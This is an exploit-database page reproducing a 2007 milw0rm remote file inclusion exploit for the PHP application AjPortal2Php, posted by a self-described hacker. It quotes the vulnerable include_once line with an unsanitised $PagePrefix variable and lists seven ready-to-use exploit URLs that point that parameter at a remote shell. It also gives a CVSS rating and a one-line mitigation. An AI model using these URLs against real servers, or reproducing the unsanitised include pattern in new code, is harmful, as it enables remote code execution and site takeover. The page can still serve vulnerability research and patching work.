header-logo
Suggest Exploit
vendor:
AjPortal2Php
by:
Alkomandoz Hacker
5.5
CVSS
MEDIUM
File Include
98
CWE
Product Name: AjPortal2Php
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AjPortal2Php File Include Vulnerability

This vulnerability allows remote attackers to include arbitrary files via a specially crafted URL.

Mitigation:

Update to a patched version of AjPortal2Php.
Source

Exploit-DB raw data:

#   [ AjPortal2Php]

# Class:     File Include Vulnerability

# Remote:    Yes

# Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip

# Author:    Alkomandoz Hacker

# Contact:   alkomandoz-hacker@hotmail.com

#############################################################

file ;

begin.inc.php
connection.inc.php
events.inc.php
footer.inc.php
header.inc.php
menuleft.inc.php
pages.inc.php


======================================================
Vuln Code

include_once($PagePrefix.'includes/configuration.inc.php');



=======================================================
Exploit :

[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell



----  Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [CiTy Of GhOsTs]

---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM

# milw0rm.com [2007-04-17]